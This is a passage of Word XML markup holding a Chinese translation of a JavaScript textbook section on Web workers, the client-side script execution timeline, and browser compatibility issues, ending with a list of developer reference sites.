        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一种并发的控制方式，叫做</w:t>
      </w:r>
      <w:r>
        <w:t>"Web worker"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Web worker</w:t>
      </w:r>
      <w:r>
        <w:t>是一个用来执行计算密集任务而不冻结用户界面的后台线程。运行在</w:t>
      </w:r>
      <w:r>
        <w:t>Web worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程里的代码不能访问文档内容，不能和主线程或其他</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>共享状态，只可以和主线程和其他</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>通过异步事件进行通信，所以主线程不能检</w:t>
      </w:r>
      <w:r>
        <w:t>测并发性，并且</w:t>
      </w:r>
      <w:r>
        <w:t>Web worker</w:t>
      </w:r>
      <w:r>
        <w:t>不能修改</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序的基础单线程执行模型。参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.4</w:t>
      </w:r>
      <w:r>
        <w:t>节获得更多</w:t>
      </w:r>
      <w:r>
        <w:t>Web worker</w:t>
      </w:r>
      <w:r>
        <w:t>的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="316" w:name="13_3_4_Ke_Hu_Duan_JavaScriptShi_Jian_Xia"/>
      <w:r>
        <w:t>13.3.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>时间线</w:t>
      </w:r>
      <w:bookmarkEnd w:id="316"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们已经看到了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序从脚本执行阶段开始，然后切换到事件处理阶段。本节会更详细地解释了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序执行的时间线。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器创建</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并且开始解析</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面，解析</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素和它们的文本内容后添加</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点到文档中。在这个阶段</w:t>
      </w:r>
      <w:r>
        <w:t>document.read</w:t>
      </w:r>
      <w:r>
        <w:t>ystate</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值是</w:t>
      </w:r>
      <w:r>
        <w:t>"loading"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>解析器遇到没有</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>属性的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素时，它把这些元素添加到文档中，然后执行行内或外部脚本。这些</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>脚本会同步执行，并且在脚本下载（如果需要）和执行时解析器会暂停。这样脚本就可以用</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>来把文本插入到输入流中。解析器恢复时这些文本会成为文档的一部分。同步脚本经常简单定义函数和注册后面使用的注册事件处理程序，但它们可以遍历和操作文档树，因为在它们执行时已经存在了。这样，同步脚本可以看到它自己的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素和它们之前的文档内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>当解析器遇到设置了</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>属性的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素时，它开始下载脚本文本，并继续解析文档。脚本会在它下载完成后尽快执行，但是解析器没有停下来等它下载。异步脚本禁止使用</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。它们可以看到自己的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素和它之前的所有文档元素，并且可能或干脆不可能访问其他的文档内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>当文档完成解析，</w:t>
      </w:r>
      <w:r>
        <w:t>document.readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性变成</w:t>
      </w:r>
      <w:r>
        <w:t>"interactive"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:t>所有有</w:t>
      </w:r>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>属性的脚本，会按它们在文档的里的出现顺序执行。异步</w:t>
      </w:r>
      <w:r>
        <w:t>脚本可能也会在这个时间执行。延迟脚本能访问完整的文档树，禁止使用</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器在</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发</w:t>
      </w:r>
      <w:r>
        <w:t>DOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:t>事件。这标志着程序执行从同步脚本执行阶段转换到了异步事件驱动阶段。但要注意，这时可能还有异步脚本没有执行完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:t>这时，文档已经完全解析完成，但是浏览器可能还在等待其他内容载入，如图片。当所有这些内容完成载入时，并且所有异步脚本完成载入和执行，</w:t>
      </w:r>
      <w:r>
        <w:t>document.readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性改变为</w:t>
      </w:r>
      <w:r>
        <w:t>"complete"</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器触发</w:t>
      </w:r>
      <w:r>
        <w:t>Win</w:t>
      </w:r>
      <w:r>
        <w:t>dow</w:t>
      </w:r>
      <w:r>
        <w:t>对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>8.</w:t>
      </w:r>
      <w:r>
        <w:t>从此刻起，会调用异步事件，以异步响应用户输入事件、网络事件、计时器过期等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是一条理想的时间线，但是所有浏览器都没有支持它的全部细节。所有浏览器普遍都支持</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件，都会触发它，它是决定文档完全载入并可以操作最通用的技术。</w:t>
      </w:r>
      <w:r>
        <w:t>DOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:t>事件在</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件之前触发，当前所有浏览器都支持这个事件，除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>之外，</w:t>
      </w:r>
      <w:r>
        <w:t>document.readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性在写本书时已被大部分浏览器实现，但是属性的值在浏览器之间有细微的差别。</w:t>
      </w:r>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>属性被所有当前版本的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>支</w:t>
      </w:r>
      <w:r>
        <w:t>持，但是现在还未被其他浏览器实现。</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>属性的支持在写本书时还不通用，但是例</w:t>
      </w:r>
      <w:r>
        <w:t>13-4</w:t>
      </w:r>
      <w:r>
        <w:t>里展示的异步脚本执行技术被当前所有当前浏览器支持。（但是，要注意用类似</w:t>
      </w:r>
      <w:r>
        <w:t>loadasync()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>动态载入脚本的能力让程序执行的脚本载入阶段和事件驱动阶段之间的界限更加模糊。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这条时间线没有指定什么时候文档开始对用户可见或什么时候</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器必须开始响应用户输入事件。这些是实现细节。对于很长的文档或非常慢的网络链接，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器理论上会渲染一部分文档，并且在所有脚本执行之前，就能允许用户开始和页面产生一些交互。这种情况下，用户输入事件可能在程序执行的事件驱动阶段开始之前触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="317" w:name="13_4_Jian_Rong_Xing_He_Hu_Yong_Xing_"/>
      <w:r>
        <w:t>13.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　兼容性和互用性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用的操作系统，但是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>是一个存在各种差异性的环境，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>文档和应用会在不同操作系统（</w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Mac OS</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>iPhone OS</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Andro</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>）的不同开发商（</w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Apple</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>）的不同时代的浏览器（从预览版的浏览器到类似</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>这种十多年之前的浏览器）上查看和运行。写一个健壮的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序并能正确地运行在这么多类型的平台上，的确是一种挑战。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>兼容性和交互性的问题可以归纳为以下三类：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>演化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>平台一直在演变和发展当中。一个标准规范会倡导一个新的特性或</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。如果特性看起来有用，浏览器开发商实现它。如果足够多的开发商实现它，开发者开始试用这个特性，</w:t>
      </w:r>
      <w:r>
        <w:t>并依赖于这个特性，然后这个特性就在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>平台中广泛使用。有时候浏览器开发商和</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发者引领这种标准规范的指定，开发好官方的版本，之前该特性已经成为一个事实的标准。另一种情况，新特性已经被添加到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>中，新浏览器支持它但是老浏览器不支持。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发者必须在使用老旧浏览器的大量用户和使用新式浏览器的少量用户之间做出权衡。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>未实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有时候，浏览器开发商之间对于某一个特性是否足够有用到要实现存在观点上的差异。一些开发商实现了这个特性，而其他的没有实现。有些现代浏览器实现的功能在老旧浏览器中没实现，这种情况还好，但</w:t>
      </w:r>
      <w:r>
        <w:t>同样实现一个功能在不同浏览器中有很大差别，例如，</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>不支持＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，虽然所有其他浏览器已经实现了它。一个更加糟糕的例子是，</w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>决定不实现</w:t>
      </w:r>
      <w:r>
        <w:t>DOM Level 2 Event</w:t>
      </w:r>
      <w:r>
        <w:t>规范（它定义了</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>和相关的方法）。这个规范在十年之前已经标准化了，其他浏览器厂商已经支持了很久了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>每个浏览器都有</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>，并且没有按照规范准确地实现所有的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>。有时候编写能兼容各个浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序是一个糟透了的工作，必须研</w:t>
      </w:r>
      <w:r>
        <w:t>究已有浏览器中的各种</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>幸运的是，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言本身是被所有浏览器厂商实现的，它不是兼容性问题的源头。所有浏览器都有对</w:t>
      </w:r>
      <w:r>
        <w:t>ES3</w:t>
      </w:r>
      <w:r>
        <w:t>的通用实现，并且在写本书的时候，所有厂商都在实现</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>ES3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>之间的转换可能会导致兼容性问题，因为一些浏览器会支持严格模式而其他的不支持，浏览器厂商对</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>的实现基本是相互通用的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>首先，要解决</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的兼容性问题是要了解问题的根源是什么。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器版本的更迭要比本书的版本快三倍多，因此本书没办法告诉你什么版本的浏览器实现了哪些特性，或者不会过多讨</w:t>
      </w:r>
      <w:r>
        <w:t>论哪些特性在某些浏览器下的表现如何或其中的</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>。这些比较具体的信息最好直接去网上查找。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准化的努力的目标是最终产生一个测试套件。在写本书的时候，还没有这样的测试，但是一旦存在这样的测试，这必定会给浏览器兼容性领域留下一些宝贵的财富。当下有一些网站提供了这种信息，可能会对你有用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>https://developer.mozilla.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>开发者中心</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>http://msdn.microsoft.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>开发者网络</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>http://developer.apple.com</w:t>
      </w:r>
      <w:r>
        <w:t>/safari</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Apple</w:t>
      </w:r>
      <w:r>
        <w:t>开发者网络里的</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>开发者中心</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>http://code.google.com/doctype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>Doctype</w:t>
      </w:r>
      <w:r>
        <w:t>项目介绍为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>开放</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>的一本百科全书</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。这个用户可以编辑的站点包含客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的各种兼容性表格。在写本书的时候，这些表格只报告了每个浏览器里是否存在各种属性和方法，而事实上没有说它们是否工作正常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>http://en.wikipedia.org/wiki/Comparison_of_layout_engines_(HTML_5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Wikipe</w:t>
      </w:r>
      <w:r>
        <w:t>dia</w:t>
      </w:r>
      <w:r>
        <w:t>文章跟踪了</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>特性和</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>在各个浏览器里的实现状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>http://en.wikipedia.org/wiki/Comparison_of_layout_engines_(Document_Object_Model)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一篇简单的文章，跟踪</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>特性的实现状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>http://a.deveria.com/caniuse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>何时可用</w:t>
      </w:r>
      <w:r>
        <w:t>……”</w:t>
      </w:r>
      <w:r>
        <w:t>站点跟踪重要</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
